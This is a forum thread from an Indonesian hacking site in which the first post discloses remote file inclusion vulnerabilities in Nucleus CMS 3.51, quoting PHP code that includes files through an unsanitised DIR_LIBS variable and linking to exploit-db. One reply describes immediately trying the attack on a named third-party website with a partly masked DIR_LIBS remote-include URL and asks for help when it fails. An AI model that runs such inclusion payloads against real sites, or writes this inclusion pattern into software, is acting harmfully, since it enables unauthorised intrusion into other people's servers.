Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-20-2013, 07:23 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 10 11 12 13 14 ... 16 Next »

Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
04-15-2010, 08:34 AM (This post was last modified: 04-15-2010 08:35 AM by eidelweiss.)
Post: #1
eidelweiss Away
Devilzc0der
*****
DC Security Grup
Posts: 1,551
Joined: Mar 2010
Reputation: 69
Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################

-=[VUln Code]=-
**********************************
Code:
[-][path_to_nucleus]/action.php

$CONF = array();
require('./config.php');

// common functions
include_once($DIR_LIBS . 'ACTION.php');

$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);

**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php

$CONF = array();
require("../../config.php");    // include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php

    $strRel = '../../../';
    require($strRel . 'config.php');
    include($DIR_LIBS . 'PLUGINADMIN.php');

########################################################

Original file and P0C can be check here:

- http://www.exploit-db.com/exploits/12241
- http://seclists.org/bugtraq/2010/Apr/121
- http://inj3ct0r.com/exploits/11794
Visit this user's website Find all posts by this user
Quote this message in a reply
04-15-2010, 12:45 PM (This post was last modified: 04-15-2010 12:57 PM by zerofreedom.)
Post: #2
zerofreedom Offline
Just a Newbie
Posts: 82
Joined: Dec 2009
Reputation: 1
RE: Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
mantap bro....
langsung coba.... ketawa

bro numpang tanya..
gini kan ya http://thinsan.net/action.php?DIR_LIBS=h...xxxx.php??
tp kluar "Sorry. An error occurred." ;prustasi
Visit this user's website Find all posts by this user
Quote this message in a reply
07-17-2010, 04:18 PM
Post: #3
ronald_cool Offline
./Devilz 1st Cadet
Posts: 43
Joined: May 2010
Reputation: 0
RE: Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
mantap kk..

makin keren aja om eidelweiss [Image: 4.gif]

nice share kk..
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  PrestaShop <= 1.5.1 Persistent XSS Vulnerability rivalsykes 2 58 06-06-2013 09:55 AM
Last Post: rivalsykes
Bug CMS Balitbang - CSRF/XSS Vulnerability nuxbie_cyber 7 383 04-19-2013 09:12 PM
Last Post: paijocode
  [Tutor] Hotel Booking Portal v0.1 Multiple Vulnerabilities Reborn Of Code 9 358 10-30-2012 12:42 PM
Last Post: xnuxer_001
  [Tutor] Sistem Biwes Multiple Vulnerability eidelweiss 10 296 09-01-2012 10:09 AM
Last Post: Super Moderator
Bug CMS DMS-Easy - Multiple Vulnerability nuxbie_cyber 6 170 06-23-2012 09:15 PM
Last Post: chiboga
Bug RevolutionTechnologies - SQL Injection Vulnerability nuxbie_cyber 6 225 06-14-2012 11:20 AM
Last Post: Anonymous33
  KasKus File Upload Vulnerability ? rusuh 24 1,065 04-13-2012 05:23 PM
Last Post: KING_cobra
Bug LY Network Cart - SQLi Vulnerability nuxbie_cyber 2 199 03-09-2012 11:02 PM
Last Post: nuxbie_cyber
Bug Base Content Management System Lennox Industries - SQL Injection Vulnerability nuxbie_cyber 12 237 02-23-2012 09:45 AM
Last Post: irash
Bug SolGens E-Commerce - SQL Injection Vulnerability nuxbie_cyber 9 423 01-21-2012 02:25 PM
Last Post: cangcimen

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-20-2013, 07:23 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE